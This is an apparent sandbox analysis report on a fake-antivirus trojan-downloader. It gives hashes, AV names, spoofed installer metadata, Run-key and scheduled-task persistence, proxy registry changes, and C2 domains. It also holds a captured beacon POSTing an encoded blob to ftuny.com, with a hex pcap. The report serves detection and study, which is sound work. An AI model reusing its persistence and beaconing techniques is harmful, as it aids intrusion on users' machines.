Analysis Date: 2015-01-17 22:43:37
MD5: 92d6a52edfbb64cf26f36ee5e1053124
SHA1: ffe4c00fc789375a4356f905ecb61d509da9941c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: d812ff3204a475a9d9226cdcf833b751 sha1: c401f0ff00cbd9148649eea383c248fd1d1ea487 size: 13312
Section .rdata md5: bcfedd3d1f091c5eff9bd0f7116b3819 sha1: 6d8d7ce902593002ef547c836295c8824c7f818a size: 2560
Section .data md5: fe963598cc5e1c82f5e20497e3de9fc2 sha1: 25f8231d425a9c58332561faef6d9ba078c13530 size: 110080
Section .rsrc md5: 4c3d737cb017a76e1c58bfb4d2cd5e23 sha1: ecbd48e54186e70f66e93317e82269c444e732a2 size: 5120
Timestamp: 2009-08-03 13:19:57 (PE header compile timestamp; it predates the 2010 copyright string in the version resource below, so at least one of the two values is not genuine)
Version info:
LegalCopyright: Copyright © 2010 Setup Technologies Q
InternalName: set_up ux
FileVersion: 4.1.0.0
CompanyName: Jordan Russell
LegalTrademarks:
Comments:
ProductName: 80 Internet Security JQ
ProductVersion: 4.1.0.0
FileDescription: m Setup Self-Extractor
OriginalFilename: set_up ux
(Note: "Jordan Russell" is the author of Inno Setup, yet the manifest embedded in the Strings section identifies this binary as an NSIS 2.46 exehead. The version resource appears to be copied to mimic a legitimate installer and should not be used for attribution.)
PEhash: 2a08dd95da2bef4b1ecdd505468c39b6f596c551
IMPhash: acb0fa4e144de036990eeae9a951869f
AV detections (28 of 29 engines flag the sample; naming converges on a Renos/FakeAlert trojan-downloader associated with fake-antivirus campaigns):
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Heur.FKP.1
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): Gen:Heur.FKP.1
AV Authentium: W32/FakeAlert.KN.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen2
AV BullGuard: Gen:Heur.FKP.1
AV CA (E-Trust Ino): Win32/Renos.D!generic
AV CAT (quickheal): Trojan.Renos.LN
AV ClamAV: Trojan.Jorik-298
AV Dr. Web: Trojan.Siggen2.26087
AV Emsisoft: Gen:Heur.FKP.1
AV Eset (nod32): Win32/TrojanDownloader.FakeAlert.BGV
AV Fortinet: W32/Diple.IZ!tr
AV Frisk (f-prot): W32/FakeAlert.KN.gen!Eldorado
AV F-Secure: Gen:Heur.FKP.1
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Trojan.SuspectCRC
AV K7: Trojan-Downloader ( 001359961 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.Downloader
AV Mcafee: Downloader-CEW.ai
AV Microsoft Security Essentials: TrojanDownloader:Win32/Renos.LX
AV MicroWorld (escan): Gen:Heur.FKP.1
AV Rising: Trojan.Win32.Generic.128513EE
AV Sophos: Mal/FakeAV-IZ
AV Symantec: Trojan.FakeAV
AV Trend Micro: TROJ_RENOS.SMRK
AV VirusBlokAda (vba32): Trojan.Jorik.Skor

Runtime Details:

Screenshot

Process
↳ C:\malware.exe (the sandbox renames the sample; the original filename is not preserved)

Creates Process: C:\malware.exe (the sample re-launches itself; the second instance performs the registry, file and network activity listed below)
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\CY08W456F0\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
(opaque base64-like blob under a random-looking key name; not decoded in this report, but the key/value names are usable host indicators)
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CY08W456F0 ➝
C:\malware.exe
(per-user autorun persistence; the value name reuses the same random-looking string as the key above)
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job (a scheduled task, i.e. a second persistence mechanism; the task's command line and schedule were not captured here)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
(the index.dat files, the WininetConnectionMutex below and the IE-style cache mutexes are side effects of using the WinINet API for HTTP, not malware artifacts in their own right)
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: topkio.com
Winsock DNS: ftuny.com

Network Details:
(Only one TCP flow was captured, to ftuny.com. The lookups of wsj.com, fastclick.com and nifty.com resolved but produced no traffic and are plausibly connectivity checks rather than C2; topkio.com, phreeway.com and tirefondn.com did not resolve at analysis time and may be fallback C2 domains — unconfirmed.)

DNS: wsj.com
Type: A
205.203.132.65
DNS: wsj.com
Type: A
205.203.140.1
DNS: wsj.com
Type: A
205.203.140.65
DNS: wsj.com
Type: A
205.203.132.1
DNS: fastclick.com
Type: A
64.156.167.84
DNS: nifty.com
Type: A
210.131.4.217
DNS: ftuny.com
Type: A
208.73.210.214
DNS: ftuny.com
Type: A
208.73.210.217
DNS: ftuny.com
Type: A
208.73.211.178
DNS: ftuny.com
Type: A
208.73.210.200
DNS: topkio.com
Type: A
(no answer recorded)
DNS: phreeway.com
Type: A
(no answer recorded)
DNS: tirefondn.com
Type: A
(no answer recorded)
HTTP POST: http://ftuny.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
(The body is a single 341-byte `data=` parameter carrying a base64-like blob — see Raw Pcap below. The hard-coded IE 6 / Windows 2000 User-Agent combined with the /borders.php path and a base64-only `data=` body is a usable network signature; the blob's encoding resembles the registry value stored under HKCU\Software\CY08W456F0, but the relationship was not verified.)
Flows TCP: 192.168.1.1:1031 ➝ 208.73.210.214:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6674756e 792e636f 6d0d0a43 6f6e7465   ftuny.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   70557275 4f487037 65526348 5069596f   pUruOHp7eRcHPiYo
0x00000150 (00336)   3939494d 55756a67 55573462 76544964   99IMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c6e 726e6c49   /Golwxlm9kLnrnlI
0x00000230 (00560)   2b355536 6e333664 2f33346b 6f6c5631   +5U6n36d/34kolV1
0x00000240 (00576)   6136516e 2b773d3d                     a6Qn+w==


Strings
(Notable items: the XML manifest at the end of this list identifies the stub as "Nullsoft Install System v2.46" exehead and requests requestedExecutionLevel="requireAdministrator", so on UAC-enabled systems the sample triggers an elevation prompt. The DVCLAL marker and the Delphi VCL error strings ("Invalid stream format", "List index out of bounds", OLE/Variant messages) suggest a Delphi-compiled component inside the NSIS wrapper — unconfirmed. VirtualAllocEx is imported, which is commonly used for cross-process injection, but no injection into another process was observed in the runtime trace above.)
sQ
.};a...
8J
 0;
1.0G.u
]
......m.

040904E4
 2010  Setup Technologies Q
4.1.0.0
80 Internet Security JQ
BBABORT
Cannot open file "%s". %s
Comments
CompanyName
Copyright 
DVCLAL
Error reading %s%s%s: %s
Failed to get data for '%s'
FHPV
FileDescription
FileVersion
InternalName
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
Jordan Russell
LegalCopyright
LegalTrademarks
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
m Setup Self-Extractor 
MS Sans Serif
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
ProductName
ProductVersion
Property is read-only
Property %s does not exist
Resource %s not found
 set_up ux
Sjv9
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
TEXTFILEDLG
TmoH
Translation
VarFileInfo
VS_VERSION_INFO
yrHD
0difzu^'
0(g '`
0=h'Bo
0u6%G	h
0xvIG'T1
11~BrS
1tgfm3
1{!#{z!
2{5tB,T
>29#?F
2',s9m
2|SVHz
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
3z T[X)#]S0
*#4c~#4z
*#4-#d
#4n!#6T!kQR
/4V8k1
4.vF4 3
~4x*Nw
!~4z1k	
])#4z##4
*#4z!#4d!k
#4z!%5
*#4z7$
#4zF=q}!k
4z!i^zE
!#4z!k
!4z$_X
@(!4zy
55tew~
5`7>hZb
58crypt32
5F)&nK-
)5s(6j
5xdx*Z
5z!#4T!,
6rDj0$
_79f5b9B5zvlqNs@24
7AzyihMm@24
_7FajNBsFkIj4Xt
)7:>]Y
7>Z[)#E
8BCt?6m,
)@}8$CEe
8>YZ7~
/9"4z"bV
9bf5hR
9+=r5+r
A1{[YI
a(bjIJ
ac F4"
}a)CNd
A"G4[&
aHNP8[
#a$p#4z
Apr n8j2w4
b2Q4ZV
b+_/ex,
|bH:rY
BKFg2}
b!L_k)#4
BPdNLUtRo
bURtF<w
b.,Z2D"
c+!E	y
$,cJ#4z
CP60 '
cR0RNtK@16
	c~s/KN
D6\F F$
"d7ue 
@.data
DbmxGJNw
|[dI%Jpg
D]n5XI
+E]9d"
eDYWiJ
eF2HYo
eN6u1a
eqz2sDJ
ExitProcess
FcD#4zWk
FDF KfU
FKu+KFL
FmWgZI
Fn4MOZ1n8Ol@24
FnGn9;
~'fp;.
fSUcdg
"	,f.V
=GeRi#
GetFullPathNameA
GetLastError
GetLocaleInfoA
GetMenu
GetModuleFileNameA
GetSysColorBrush
h& 9^r.mDtM
he@9Dm
'+>^Hf#
hiN3Bj
!#hJ"k
`'HQP VH
}HW#jh
"hw Q4}
I6dx?Q
IA3'>%	
ihMrjq
&I]lLV
ImNGv9
i_	NU_
iXB/)^0!
iyGyot
jL^u+[
jW1;/)q
jypLl:Y
!#@:!k
kernel32.dll
KqazR38CLhQmuf
;KR	Sz
KR[+XN&
L4yNC<P
l9_u_pvC@4
l_N3nnt
LoadCursorA
LoadIconA
LoadKeyboardLayoutA
LoadLibraryA
l	[u|7
+(LV9^
Ly #1-
MFqVAb7Yw
M,NWHs
M@Qm6t
	;nBX;
&=N|Db
&n	`h9_
n?>OSU
:NVItkX
O	6G@8Y4
_O6Ltay0LTb@4
oC6eWtap
Oe`QP3
oj[`;h
_>	^oU
ou3r7sW
	o	`>.x
:p8B^J
pBdf('
;pDtng>pRN*
P g@|B
_pUx_aySM
?)PxnpR
`.rdata
rHQ_;C
^RkEjx
)R=O#]
rOH}&>
@S,78]
SCFEh=;jB
 set_up ux
St*vBj9
Su9eN|
)T.#>-
t49I	%
t8+o|H
TAdH8)$
tAt@HH
t$EhK4`^s
This program must be run under Win32
t"HK2P
tIpF;a
TomaR"8~E
t-qh0/
tVGafB
tZb	K`
u^6C?c
uD0|e]
UNIQSTRgPG9
urKkbjTh
USER32.DLL
uSWtF&
U=T?};
uWjTT91
(v22_%
V"4z!L
va*,8\
^V!C~+
v}DZd(
VirtualAllocEx
 vM;0tq\
v_p 90-
Vziq5p
W)#]<{
W|3E1j
WB+L{8
W)#e:	
wL*9YG
_w@N+I
W)",Q"
WrknE5
W-'XCi
x2pSxmw
X)#4z!#
X)#4z!#)
x7Fx_>
>"X:FK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
Xn/.P>
X)#szD
:>x zY
"(]x&ZY
YG5Nw74r
YK	qW	l
y #,M"A
z!#*@e
z!k@\Va4
ZYge8@